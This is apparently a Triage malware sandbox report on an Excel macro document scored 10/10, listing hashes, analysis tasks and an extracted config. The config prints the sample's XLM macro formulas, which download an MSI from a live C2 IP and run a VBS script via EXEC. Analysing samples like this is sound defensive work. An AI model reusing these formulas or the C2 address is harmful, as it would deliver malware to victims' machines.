3a6c1f5c952835853073296650f26443 | Triage

Submit
Reports

Overview

overview

Static

static

3a6c1f5c95...3.xlsm

windows7-x64

3a6c1f5c95...3.xlsm

windows10-2004-x64

1

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

3a6c1f5c952835853073296650f26443.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

3a6c1f5c952835853073296650f26443.xlsm

Resource

win10v2004-20231222-en

windows10-2004-x64

1 signatures

150 seconds

General

Target

3a6c1f5c952835853073296650f26443
Size

6KB
MD5

3a6c1f5c952835853073296650f26443
SHA1

90bc2166ff4a862bfec0fc12f7d2ae4363be656d
SHA256

f90b84a50e0f58d421b397854d3a2e76b517d7ef6a436e47c086c5ee7d100d20
SHA512

76bb9836ff3340ddfc95334453f49ba22c0c0fc9a0db1b29e2b94658879aaa9cc442688a64044f32572e0b1e36ab9c84f367199196720b22d390822965f1a561
SSDEEP

192:NDShuSnbrA2OmmfRq8UhHFBFYu0b98y+3+dhj:NyukM2w81FYNb98y+U

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

3a6c1f5c952835853073296650f26443
.xlsm office2007

© 2018-2025

Terms | Privacy